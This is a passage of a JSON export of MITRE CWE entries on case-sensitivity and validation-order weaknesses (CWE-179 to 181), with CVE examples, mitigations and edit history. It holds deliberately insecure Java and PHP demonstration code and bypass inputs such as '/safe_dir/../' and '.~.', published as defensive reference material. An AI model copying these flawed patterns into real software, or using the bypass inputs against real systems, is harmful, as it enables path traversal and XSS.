names."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"706","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"706","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"433","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"289","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-44"},"Phase":"Architecture and Design","Strategy":"Input Validation","Description":"Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-141"},"Intro_Text":"In the following example, an XSS neutralization method intends to replace script tags in user-supplied input with a safe equivalent:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public String preventXSS(String input, String mask) {}","xhtml:div":{"#text":"return input.replaceAll(\\"script\\", mask);","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"The code only works when the \\"script\\" tag is in all lower-case, forming an incomplete denylist (CWE-184). Equivalent tags such as \\"SCRIPT\\" or \\"ScRiPt\\" will not be neutralized by this method, allowing an XSS attack."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-0499","Description":"Application server allows attackers to bypass execution of a jsp page and read the source code using an upper case JSP extension in the request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0499"},{"Reference":"CVE-2000-0497","Description":"The server is case sensitive, so filetype handlers treat .jsp and .JSP as different extensions. JSP source code may be read because .JSP defaults to the filetype \\"text\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0497"},{"Reference":"CVE-2000-0498","Description":"The server is case sensitive, so filetype handlers treat .jsp and .JSP as different extensions. JSP source code may be read because .JSP defaults to the filetype \\"text\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0498"},{"Reference":"CVE-2001-0766","Description":"A URL that contains some characters whose case is not matched by the server\'s filters may bypass access restrictions because the case-insensitive file system will then handle the request after it bypasses the case sensitive filter.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0766"},{"Reference":"CVE-2001-0795","Description":"Server allows remote attackers to obtain source code of CGI scripts via URLs that contain MS-DOS conventions such as (1) upper case letters or (2) 8.3 file names.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0795"},{"Reference":"CVE-2001-1238","Description":"Task Manager does not allow local users to end processes with uppercase letters named (1) winlogon.exe, (2) csrss.exe, (3) smss.exe and (4) services.exe via the Process tab which could allow local users to install Trojan horses that cannot be stopped.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1238"},{"Reference":"CVE-2003-0411","Description":"chain: Code was ported from a case-sensitive Unix platform to a case-insensitive Windows platform where filetype handlers treat .jsp and .JSP as different extensions. JSP source code may be read because .JSP defaults to the filetype \\"text\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0411"},{"Reference":"CVE-2002-0485","Description":"Leads to interpretation error","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0485"},{"Reference":"CVE-1999-0239","Description":"Directories may be listed because lower case web requests are not properly handled by the server.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0239"},{"Reference":"CVE-2005-0269","Description":"File extension check in forum software only verifies extensions that contain all lowercase letters, which allows remote attackers to upload arbitrary files via file extensions that include uppercase letters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0269"},{"Reference":"CVE-2004-1083","Description":"Web server restricts access to files in a case sensitive manner, but the filesystem accesses files in a case insensitive manner, which allows remote attackers to read privileged files using alternate capitalization.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1083"},{"Reference":"CVE-2002-2119","Description":"Case insensitive passwords lead to search space reduction.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2119"},{"Reference":"CVE-2004-2214","Description":"HTTP server allows bypass of access restrictions using URIs with mixed case.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2214"},{"Reference":"CVE-2004-2154","Description":"Mixed upper/lowercase allows bypass of ACLs.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2154"},{"Reference":"CVE-2005-4509","Description":"Bypass malicious script detection by using tokens that aren\'t case sensitive.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4509"},{"Reference":"CVE-2002-1820","Description":"Mixed case problem allows \\"admin\\" to have \\"Admin\\" rights (alternate name property).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1820"},{"Reference":"CVE-2007-3365","Description":"Chain: uppercase file extensions causes web server to return script source code instead of executing the script.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3365"}]},"Functional_Areas":{"Functional_Area":"File Processing"},"Affected_Resources":{"Affected_Resource":"File or Directory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Case Sensitivity (lowercase, uppercase, mixed case)"}},"Notes":{"Note":{"#text":"These are probably under-studied in Windows and Mac environments, where file names are case-insensitive and thus are subject to equivalence manipulations involving case.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Observed_Example, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Applicable_Platforms, Functional_Areas, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":[{"#text":"Case Sensitivity (Lowercase, Uppercase, Mixed Case)","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Resolve Case Sensitivity","attr":{"@_Date":"2010-12-13"}}]}},"179":{"attr":{"@_ID":"179","@_Name":"Incorrect Behavior Order: Early Validation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software validates input before applying protection mechanisms that modify the input, which could allow an attacker to bypass the validation via dangerous inputs that only arise after the modification.","Extended_Description":"Software needs to validate data at the proper time, after data has been canonicalized and cleansed. Early validation is susceptible to various manipulations that result in dangerous inputs that are produced by canonicalization and cleansing.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"696","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"Since early validation errors usually arise from improperly implemented defensive mechanisms, it is likely that these will be introduced more frequently as secure programming becomes implemented more widely."}},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Integrity"],"Impact":["Bypass Protection Mechanism","Execute Unauthorized Code or Commands"],"Note":"An attacker could include dangerous input that bypasses validation protection mechanisms which can be used to launch various attacks including injection attacks, execute arbitrary code or cause other unintended behavior."}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-35"},"Intro_Text":"The following code attempts to validate a given input path by checking it against an allowlist and then return the canonical path. In this specific case, the path is considered valid if it starts with the string \\"/safe_dir/\\".","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String path = getInputPath();if (path.startsWith(\\"/safe_dir/\\")){}","xhtml:br":["",""],"xhtml:div":{"#text":"File f = new File(path);return f.getCanonicalPath();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"String path = getInputPath();File f = new File(path);if (f.getCanonicalPath().startsWith(\\"/safe_dir/\\")){}","xhtml:br":["","","","",""],"xhtml:div":{"#text":"return f.getCanonicalPath();","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":["The problem with the above code is that the validation step occurs before canonicalization occurs. An attacker could provide an input path of \\"/safe_dir/../\\" that would pass the validation step. However, the canonicalization process sees the double dot as a traversal to the parent directory and hence when canonicized the path would become just \\"/\\".","To avoid this problem, validation should occur after canonicalization takes place. In this case canonicalization occurs during the initialization of the File object. The code below fixes the issue."]},{"attr":{"@_Demonstrative_Example_ID":"DX-36"},"Intro_Text":"This script creates a subdirectory within a user directory and sets the user as the owner.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function createDir($userName,$dirName){}","xhtml:div":{"#text":"$userDir = \'/users/\'. $userName;if(strpos($dirName,\'..\') !== false){}$dirName = str_replace(\'~\',\'\',$dirName);$newDir = $userDir . $dirName;mkdir($newDir, 0700);chown($newDir,$userName);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","",""],"xhtml:div":{"#text":"echo \'Directory name contains invalid sequence\';return;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:i":"//filter out \'~\' because other scripts identify user directories by this prefix"}}},"Body_Text":"While the script attempts to screen for \'..\' sequences, an attacker can submit a directory path including \\".~.\\", which will then become \\"..\\" after the filtering step. This allows a Path Traversal (CWE-21) attack to occur."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0433","Description":"Product allows remote attackers to view restricted files via an HTTP request containing a \\"*\\" (wildcard or asterisk) character.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0433"},{"Reference":"CVE-2003-0332","Description":"Product modifies the first two letters of a filename extension after performing a security check, which allows remote attackers to bypass authentication via a filename with a .ats extension instead of a .hts extension.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0332"},{"Reference":"CVE-2002-0802","Description":"Database consumes an extra character when processing a character that cannot be converted, which could remove an escape character from the query and make the application subject to SQL injection attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0802"},{"Reference":"CVE-2000-0191","Description":"Overlaps \\"fakechild/../realchild\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0191"},{"Reference":"CVE-2004-2363","Description":"Product checks URI for \\"&lt;\\" and other literal characters, but does it before hex decoding the URI, so \\"%3E\\" and other sequences are allowed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2363"},{"Reference":"CVE-2002-0934","Description":"Directory traversal vulnerability allows remote attackers to read or modify arbitrary files via invalid characters between two . (dot) characters, which are filtered and result in a \\"..\\" sequence.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0934"},{"Reference":"CVE-2003-0282","Description":"Directory traversal vulnerability allows attackers to overwrite arbitrary files via invalid characters between two . (dot) characters, which are filtered and result in a \\"..\\" sequence.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0282"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Early Validation Errors"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"3"}},{"attr":{"@_CAPEC_ID":"43"}},{"attr":{"@_CAPEC_ID":"71"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, &#34;Escaping Metacharacters&#34;, Page 439"}}},"Notes":{"Note":{"#text":"These errors are mostly reported in path traversal vulnerabilities, but the concept applies whenever validation occurs.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, Relationships"}],"Previous_Entry_Name":{"#text":"Early Validation Errors","attr":{"@_Date":"2008-04-11"}}}},"180":{"attr":{"@_ID":"180","@_Name":"Incorrect Behavior Order: Validate Before Canonicalize","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software validates input before it is canonicalized, which prevents the software from detecting data that becomes invalid after the canonicalization step.","Extended_Description":"This can be used by an attacker to bypass the validation and launch attacks that expose weaknesses that would otherwise be prevented, such as injection.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"179","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-35"},"Intro_Text":"The following code attempts to validate a given input path by checking it against an allowlist and then return the canonical path. In this specific case, the path is considered valid if it starts with the string \\"/safe_dir/\\".","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String path = getInputPath();if (path.startsWith(\\"/safe_dir/\\")){}","xhtml:br":["",""],"xhtml:div":{"#text":"File f = new File(path);return f.getCanonicalPath();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"String path = getInputPath();File f = new File(path);if (f.getCanonicalPath().startsWith(\\"/safe_dir/\\")){}","xhtml:br":["","","","",""],"xhtml:div":{"#text":"return f.getCanonicalPath();","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":["The problem with the above code is that the validation step occurs before canonicalization occurs. An attacker could provide an input path of \\"/safe_dir/../\\" that would pass the validation step. However, the canonicalization process sees the double dot as a traversal to the parent directory and hence when canonicized the path would become just \\"/\\".","To avoid this problem, validation should occur after canonicalization takes place. In this case canonicalization occurs during the initialization of the File object. The code below fixes the issue."]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0433","Description":"Product allows remote attackers to view restricted files via an HTTP request containing a \\"*\\" (wildcard or asterisk) character.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0433"},{"Reference":"CVE-2003-0332","Description":"Product modifies the first two letters of a filename extension after performing a security check, which allows remote attackers to bypass authentication via a filename with a .ats extension instead of a .hts extension.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0332"},{"Reference":"CVE-2002-0802","Description":"Database consumes an extra character when processing a character that cannot be converted, which could remove an escape character from the query and make the application subject to SQL injection attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0802"},{"Reference":"CVE-2000-0191","Description":"Overlaps \\"fakechild/../realchild\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0191"},{"Reference":"CVE-2004-2363","Description":"Product checks URI for \\"&lt;\\" and other literal characters, but does it before hex decoding the URI, so \\"%3E\\" and other sequences are allowed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2363"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Validate-Before-Canonicalize"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A1","Entry_Name":"Unvalidated Input","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"IDS01-J","Entry_Name":"Normalize strings before validating them","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"SEI CERT Oracle Coding Standard for Java"},"Entry_ID":"IDS01-J","Entry_Name":"Normalize strings before validating them","Mapping_Fit":"Exact"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"267"}},{"attr":{"@_CAPEC_ID":"3"}},{"attr":{"@_CAPEC_ID":"71"}},{"attr":{"@_CAPEC_ID":"78"}},{"attr":{"@_CAPEC_ID":"79"}},{"attr":{"@_CAPEC_ID":"80"}}]},"Notes":{"Note":{"#text":"This overlaps other categories.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Functional_Areas"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Validate-Before-Canonicalize","attr":{"@_Date":"2008-04-11"}}}},"181":{"attr":{"@_ID":"181","@_Name":"Incorrect Behavior Order: Validate Before Filter","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software validates data before it has been filtered, which prevents the software from detecting data that becomes invalid after the filtering step.","Extended_Description":"This can be used by an attacker to bypass the validation and launch attacks that expose weaknesses that would otherwise be prevented, such as injection.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"179","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Validate-before-cleanse"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Implementation","Architecture and Design"],"Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being filtered."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-36"},"Intro_Text":"This script creates a subdirectory within a user directory and sets the user as the owner.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function createDir($userName,$dirName){}","xhtml:div":{"#text":"$userDir = \'/users/\'. $userName;if(strpos($dirName,\'..\') !== false){}$dirName = str_replace(\'~\',\'\',$dirName);$newDir = $userDir . $dirName;mkdir($newDir, 0700);chown($newDir,$userName);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","",""],"xhtml:div":{"#text":"echo \'Directory name contains invalid sequence\';return;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:i":"//filter out \'~\' because other scripts identify user directories by this prefix"}}},"Body_Text":"While the script attempts to screen for \'..\' sequences, an attacker can submit a directory path including \\".~.\\", which will then become \\"..\\" after the filtering step. This allows a Path Traversal (CWE-21) attack to occur."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0934","Description":"Directory traversal vulnerability allows remote attackers to read or modify arbitrary files via invalid characters between two . (dot) characters, which are filtered and result in a \\"..\\" sequence.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0934"},{"Reference":"CVE-2003-0282","Description":"Directory traversal vulnerability allows attackers to overwrite arbitrary files via invalid characters between two . (dot) characters, which are filtered and result in a \\"..\\" sequence.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0282"}]},"Functional_Areas":{"Functional_Area":"Protection Mechanism"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Validate-Before-Filter"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A1","Entry_Name":"Unvalidated Input","Mapping_Fit":"CWE More Specific"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"120"}},{"attr":{"@_CAPEC_ID":"267"}},{"attr":{"@_CAPEC_ID":"3"}},{"attr":{"@_CAPEC_ID":"43"}},{"attr":{"@_CAPEC_ID":"78"}},{"attr":{"@_CAPEC_ID":"79"}},{"attr":{"@_CAPEC_ID":"80"}}]},"Notes":{"Note":{"#text":"This category is probably under-studied.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Functional_Areas, Relationships, Research_Gaps, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated 